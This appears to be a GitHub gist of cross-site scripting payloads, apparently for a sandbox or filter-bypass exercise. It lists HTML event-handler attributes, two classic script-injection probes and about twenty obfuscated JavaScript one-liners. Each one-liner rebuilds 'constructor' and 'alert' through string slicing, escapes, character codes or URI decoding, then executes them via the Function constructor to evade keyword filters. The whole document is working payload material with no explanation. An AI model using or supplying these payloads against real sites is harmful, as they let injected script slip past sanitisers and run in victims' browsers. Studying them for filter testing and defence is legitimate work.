Skip to content

Instantly share code, notes, and snippets.

@tyage

tyage/eventlistener Secret

Last active August 29, 2015 14:04
Show Gist options
  • Save tyage/df5d8252ea93953785f5 to your computer and use it in GitHub Desktop.
Save tyage/df5d8252ea93953785f5 to your computer and use it in GitHub Desktop.
Download ZIP
箱庭
Raw
eventlistener
onclick
onchange
onblur
onfocus
onkeydown
onkeypress
onmousedown
onmouseenter
onmouseleave
onmousemove
onmouseout
onmouseover
onmouseup
ondblclick
onselect
style="expression:expression(alert('XSS'))"
"><script>alert('XSS')</script>
Raw
xss.js
hoge14='constructorhoge14'.slice(84645-84645,84656-84645);hoge15='alerthoge14'.slice(84645-84645,84650-84645);hoge16='XSShoge14'.slice(84645-84645,84648-84645);[][hoge14][hoge14](hoge15+'(\''+hoge16+'\')')()
hoge17='constructorhoge17'.substr(45998-45998,46009-45998);hoge18='alerthoge17'.substr(45998-45998,46003-45998);hoge19='XSShoge17'.substr(45998-45998,46001-45998);[][hoge17][hoge17](hoge18+'(\''+hoge19+'\')')()
hoge20='constructorhogee'.replace('hogee','');hoge21='alerthogee'.replace('hogee','');hoge22='XSShogee'.replace('hogee','');[][hoge20][hoge20](hoge21+'(\''+hoge22+'\')')()
hoge30=88831-88831;hoge31='cccchoge30'.split('')[hoge30]+'oooohoge30'.split('')[hoge30]+'nnnnhoge30'.split('')[hoge30]+'sssshoge30'.split('')[hoge30]+'tttthoge30'.split('')[hoge30]+'rrrrhoge30'.split('')[hoge30]+'uuuuhoge30'.split('')[hoge30]+'cccchoge30'.split('')[hoge30]+'tttthoge30'.split('')[hoge30]+'oooohoge30'.split('')[hoge30]+'rrrrhoge30'.split('')[hoge30];hoge32='aaaahoge30'.split('')[hoge30]+'llllhoge30'.split('')[hoge30]+'eeeehoge30'.split('')[hoge30]+'rrrrhoge30'.split('')[hoge30]+'tttthoge30'.split('')[hoge30];hoge33='XXXXhoge30'.split('')[hoge30]+'SSSShoge30'.split('')[hoge30]+'SSSShoge30'.split('')[hoge30];[][hoge31][hoge31](hoge32+'(\''+hoge33+'\')')()
hoge41='constructorhoge41'['sl'+'ice'](82124-82124,82135-82124);hoge42='alerthoge41'['sl'+'ice'](82124-82124,82129-82124);hoge43='XSShoge41'['sl'+'ice'](82124-82124,82127-82124);[][hoge41][hoge41](hoge42+'(\''+hoge43+'\')')()
hoge51='constructorhoge51'['sub'+'str'](48363-48363,48374-48363);hoge52='alerthoge51'['sub'+'str'](48363-48363,48368-48363);hoge53='XSShoge51'['sub'+'str'](48363-48363,48366-48363);[][hoge51][hoge51](hoge52+'(\''+hoge53+'\')')()
hoge61='constructorhoge64'['rep'+'lace']('hoge64','');hoge62='alerthoge64'['rep'+'lace']('hoge64','');hoge63='XSShoge64'['rep'+'lace']('hoge64','');[][hoge61][hoge61](hoge62+'(\''+hoge63+'\')')()
hoge90=62536-62536;hoge91='cccchoge90'['sp'+'lit']('')[hoge90]+'oooohoge90'['sp'+'lit']('')[hoge90]+'nnnnhoge90'['sp'+'lit']('')[hoge90]+'sssshoge90'['sp'+'lit']('')[hoge90]+'tttthoge90'['sp'+'lit']('')[hoge90]+'rrrrhoge90'['sp'+'lit']('')[hoge90]+'uuuuhoge90'['sp'+'lit']('')[hoge90]+'cccchoge90'['sp'+'lit']('')[hoge90]+'tttthoge90'['sp'+'lit']('')[hoge90]+'oooohoge90'['sp'+'lit']('')[hoge90]+'rrrrhoge90'['sp'+'lit']('')[hoge90];hoge92='aaaahoge90'['sp'+'lit']('')[hoge90]+'llllhoge90'['sp'+'lit']('')[hoge90]+'eeeehoge90'['sp'+'lit']('')[hoge90]+'rrrrhoge90'['sp'+'lit']('')[hoge90]+'tttthoge90'['sp'+'lit']('')[hoge90];hoge93='XXXXhoge90'['sp'+'lit']('')[hoge90]+'SSSShoge90'['sp'+'lit']('')[hoge90]+'SSSShoge90'['sp'+'lit']('')[hoge90];[][hoge91][hoge91](hoge92+'(\''+hoge93+'\')')()
hoge71='const'+'ructor';hoge72=hoge71[hoge71]['fromChar'+'Code'];hoge73=hoge72(64951-64854,64962-64854,64955-64854,64968-64854,64970-64854,64894-64854,64893-64854,64942-64854,64937-64854,64937-64854,64893-64854,64895-64854);[][hoge71][hoge71](hoge73)()
hoge81='constructorhoge81'['\u0073lice'](35767-35767,35778-35767);hoge82='alerthoge81'['\u0073lice'](35767-35767,35772-35767);hoge83='XSShoge81'['\u0073lice'](35767-35767,35770-35767);[][hoge81][hoge81](hoge82+'(\''+hoge83+'\')')()
barr101='constructorbarr101'['\x73lice'](96665-96665,96676-96665);barr102='alertbarr101'['\x73lice'](96665-96665,96670-96665);barr103='XSSbarr101'['\x73lice'](96665-96665,96668-96665);[][barr101][barr101](barr102+'(\''+barr103+'\')')()
barr111='constructorbarr111'['\163lice'](26385-26385,26396-26385);barr112='alertbarr111'['\163lice'](26385-26385,26390-26385);barr113='XSSbarr111'['\163lice'](26385-26385,26388-26385);[][barr111][barr111](barr112+'(\''+barr113+'\')')()
barr121='constructor barr121'['\u0073ubstr'](38198-38198,38209-38198);barr122='alertbarr121'['\u0073ubstr'](38198-38198,38203-38198);barr123='XSSbarr121'['\u0073ubstr'](38198-38198,38201-38198);[][barr121][barr121](barr122+'(\''+barr123+'\')')()
barr131='constructorbarr131'['\x73ubstr'](18916-18916,18927-18916);barr132='alertbarr131'['\x73ubstr'](18916-18916,18921-18916);barr133='XSSbarr131'['\x73ubstr'](18916-18916,18919-18916);[][barr131][barr131](barr132+'(\''+barr133+'\')')()
barr141='constructorbarr141'['\163ubstr'](3873-3873,3884-3873);barr142='alertbarr131'['\163ubstr'](3873-3873,3878-3873);barr143='XSSbarr141'['\163ubstr'](3873-3873,3876-3873);[][barr141][barr141](barr142+'(\''+barr143+'\')')()
barr151='constructorbarr154'['\u0072eplace']('barr154','');barr152='alertbarr154'['\u0072eplace']('barr154','');barr153='XSSbarr154'['\u0072eplace']('barr154','');[][barr151][barr151](barr152+'(\''+barr153+'\')')()
barr161='constructorbarr164'['\x72eplace']('barr164','');barr162='alertbarr164'['\x72eplace']('barr164','');barr163='XSSbarr164'['\x72eplace']('barr164','');[][barr161][barr161](barr162+'(\''+barr163+'\')')()
barr171='constructorbarr174'['\162eplace']('barr174','');barr172='alertbarr174'['\162eplace']('barr174','');barr173='XSSbarr174'['\162eplace']('barr174','');[][barr171][barr171](barr172+'(\''+barr173+'\')')()
barr180=decodeURI('%63%6f%6e%73%74%72%75%63%74%6f%72');barr181=decodeURI('%61%6c%65%72%74%28%27%58%53%53%27%29');[][barr180][barr180](barr181)()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment